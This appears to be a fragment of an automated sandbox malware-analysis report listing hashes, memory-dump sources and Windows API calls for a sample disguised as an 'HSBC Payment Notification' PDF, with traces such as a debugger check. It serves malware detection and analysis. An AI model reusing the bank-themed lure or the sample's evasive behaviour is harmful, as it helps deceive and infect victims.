                                                                                                                                                    • Instruction ID: 43824745660c3988bd5ee8fabd2b32f2c8f8042702d18c831ff1fab54f9b3e1b
                                                                                                                                                    • Opcode Fuzzy Hash: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                                                                                                                                    • Instruction Fuzzy Hash: ED118274A15208AACB40EB648945FDD77B8AF08354B0044ABB948E7291EAB8B6C4471D
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fread_nolock_memmove
                                                                                                                                                    • String ID: EA06
                                                                                                                                                    • API String ID: 1988441806-3962188686
                                                                                                                                                    • Opcode ID: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                                                                                                                                                    • Instruction ID: 3cd15271acb3b06ac884f373c06a49f445b450121f82016c471601618c020999
                                                                                                                                                    • Opcode Fuzzy Hash: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                                                                                                                                                    • Instruction Fuzzy Hash: 8F01F9719042287EDB18CAA9D816EFE7BFCDB11301F00459FF552D2181E878E6048764
                                                                                                                                                    APIs
                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                                                    • String ID: aut
                                                                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                                                                    • Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                                                                                                                    • Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
                                                                                                                                                    • Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                                                                                                                    • Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                                                                                                                    • Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
                                                                                                                                                    • Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                                                                                                                    • Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 00404370
                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconNotifyShell_$_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1505330794-0
                                                                                                                                                    • Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                                                                                                                    • Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
                                                                                                                                                    • Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                                                                                                                    • Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A
                                                                                                                                                    APIs
                                                                                                                                                    • __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                                                                                      • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
                                                                                                                                                      • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C
                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                                                                                      • Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
                                                                                                                                                      • Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308
                                                                                                                                                      • Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
                                                                                                                                                      • Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE
                                                                                                                                                      • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                                                                                    • RtlAllocateHeap.NTDLL(00A60000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1372826849-0
                                                                                                                                                    • Opcode ID: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                                                                                                                                    • Instruction ID: 12628286b9c33790f0bcaf27d243d0f78d5a939af01e39ac9af769d2403f214a
                                                                                                                                                    • Opcode Fuzzy Hash: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                                                                                                                                    • Instruction Fuzzy Hash: 8101D235380B31DADA102B36BC42A2E67588BC2766FD0043FF9059A281DE7C9D01866D
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
                                                                                                                                                    • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3397143404-0
                                                                                                                                                    • Opcode ID: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                                                                                                                                    • Instruction ID: c759ec0fed9c3a555ac5ec6521767d99e991bc38b38178bd45d0c2782cb34c4e
                                                                                                                                                    • Opcode Fuzzy Hash: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                                                                                                                                    • Instruction Fuzzy Hash: 6EE08632140214B7D7212B54EC0DFDE7B19EB06760F144535FF14A90E087B12925979C
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 00468D1B
                                                                                                                                                      • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                                                                                                                      • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                                                                                                                    • _free.LIBCMT ref: 00468D2C
                                                                                                                                                    • _free.LIBCMT ref: 00468D3E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                                                    • Instruction ID: 6b151060fb8ed88ed9ffdc5938a612973e117ec8253147f08314cae1c0c73c84
                                                                                                                                                    • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                                                    • Instruction Fuzzy Hash: 10E0C2B170171253CB20A579BA40A8313DC4F4C3967440A0FB40DD7282DEACF842803C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: CALL
                                                                                                                                                    • API String ID: 0-4196123274
                                                                                                                                                    • Opcode ID: 988d096a90f12cc4061dfc2aee605c5c715a60049277719237c80f455d37a458
                                                                                                                                                    • Instruction ID: c803bb07f2a617980fc862d1973d54e65b33ee20ceb4547c7cbfd92c67e19f3b
                                                                                                                                                    • Opcode Fuzzy Hash: 988d096a90f12cc4061dfc2aee605c5c715a60049277719237c80f455d37a458
                                                                                                                                                    • Instruction Fuzzy Hash: 8A225B70608301DFD724DF14C454A6AB7E1FF44308F15896EE98AAB3A2D739EC55CB8A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fa53ab6fccb58a38cea3d83407b422227650d67c7ebea9c164bc1db8e43f9171
                                                                                                                                                    • Instruction ID: 4d3c82b64673b691034b442580d226850ef5f5aaba5c12ca0e6634462ae360c3
                                                                                                                                                    • Opcode Fuzzy Hash: fa53ab6fccb58a38cea3d83407b422227650d67c7ebea9c164bc1db8e43f9171
                                                                                                                                                    • Instruction Fuzzy Hash: B2B1E921D0C3C19AEB26862488147677FE15FA26E8FCC478DEFD5476D2D3698508C763
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1a782142deb8d1b0be251c33f32ee93cce7daad71e8587f750f4b916d8cc5aaa
                                                                                                                                                    • Instruction ID: 9fb7e5478e6ebf411f601caf5b952e3b07d3e2ef2b2a837996d336269e90faf0
                                                                                                                                                    • Opcode Fuzzy Hash: 1a782142deb8d1b0be251c33f32ee93cce7daad71e8587f750f4b916d8cc5aaa
                                                                                                                                                    • Instruction Fuzzy Hash: 1551D721D0C3819AEB358E248A787767BA16F526E8FCC458AE7918A1E1C3E58408C7D3
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4104443479-0
                                                                                                                                                    • Opcode ID: 00b6a16159f735a3c12135094c92ccfe771db5f98c44acd5d958ee256f2e2c9e
                                                                                                                                                    • Instruction ID: 665aeeeda7618be144ab26ba5ea9c3b14b1a5e971dff4faecb2a1d88e99e5761
                                                                                                                                                    • Opcode Fuzzy Hash: 00b6a16159f735a3c12135094c92ccfe771db5f98c44acd5d958ee256f2e2c9e
                                                                                                                                                    • Instruction Fuzzy Hash: 8841D7716082059BCB10FFA9D8859BAB7E8EF49308B64445FE14597382EF3D9C05CB6A
                                                                                                                                                    APIs
                                                                                                                                                    • GetSidSubAuthorityCount.ADVAPI32 ref: 02F18199
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,02F15563), ref: 02F181EB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AuthorityCloseCountHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1604591301-0
                                                                                                                                                    • Opcode ID: 54ccfe22153496f0396d3da74a5b8bcb36d630387ae277a76e685edd1b976d4c
                                                                                                                                                    • Instruction ID: e33f2b2ff6c94b681bc8a2493e23b49ece5659c9b04a970b463f87a125bafec6
                                                                                                                                                    • Opcode Fuzzy Hash: 54ccfe22153496f0396d3da74a5b8bcb36d630387ae277a76e685edd1b976d4c
                                                                                                                                                    • Instruction Fuzzy Hash: D2213A32D082509FFE3E9A188E18F367B68AA415FCFDC45C5EB5AD61F1D320A805C652
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$PointerRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3154509469-0
                                                                                                                                                    • Opcode ID: 1c70831341e7969fa04131c75bd4db623dfb82e290531eaa238467f6fc8f5fda
                                                                                                                                                    • Instruction ID: 853538f8a3266250870be95e205c53b0c341b7de192a643a4c245e78f3d18703
                                                                                                                                                    • Opcode Fuzzy Hash: 1c70831341e7969fa04131c75bd4db623dfb82e290531eaa238467f6fc8f5fda
                                                                                                                                                    • Instruction Fuzzy Hash: F0317AA1E0D384CFEB269A29C8393357F605F522DCFCA40DAD7828A1AAD7654409C762
                                                                                                                                                    APIs
                                                                                                                                                    • WriteFile.KERNEL32(?,?,0000004C,?,00000000), ref: 02F1ACDE
                                                                                                                                                    • SetFilePointerEx.KERNEL32(?,0000004C,?,00000000), ref: 02F1AD99
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$PointerWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 539440098-0
                                                                                                                                                    • Opcode ID: 3ca7215a97f6a87129d6d3cff851e2b4ba358524abba1b47b57b227c2fa74482
                                                                                                                                                    • Instruction ID: aaeeaa1e8d9db405671045c037d77c38206fe5535df5f1736f97c1a01ea03823
                                                                                                                                                    • Opcode Fuzzy Hash: 3ca7215a97f6a87129d6d3cff851e2b4ba358524abba1b47b57b227c2fa74482
                                                                                                                                                    • Instruction Fuzzy Hash: 5721E47090F7C0AFE727C7248818B66BFA16F82299FC8C489F3994A1E2D778C504C756
                                                                                                                                                    APIs
                                                                                                                                                    • IsThemeActive.UXTHEME ref: 00404834
                                                                                                                                                      • Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
                                                                                                                                                      • Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
                                                                                                                                                      • Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389
                                                                                                                                                      • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
                                                                                                                                                      • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A
                                                                                                                                                      • Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                                                                                                                      • Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                                                                                                                      • Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                                                                                                                      • Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1438897964-0
                                                                                                                                                    • Opcode ID: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                                                                                                                                    • Instruction ID: 9525eea27cfe2a06ee6bb0b94f8a439f0fec78f72a1223afaaa4f4cc7b3f6ca0
                                                                                                                                                    • Opcode Fuzzy Hash: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                                                                                                                                    • Instruction Fuzzy Hash: 96118E729143019BC700EF69E80591EBBE8EB95754F10893FF440932B2DB749A49CB9E
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 00405CC7
                                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 0043DD73
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
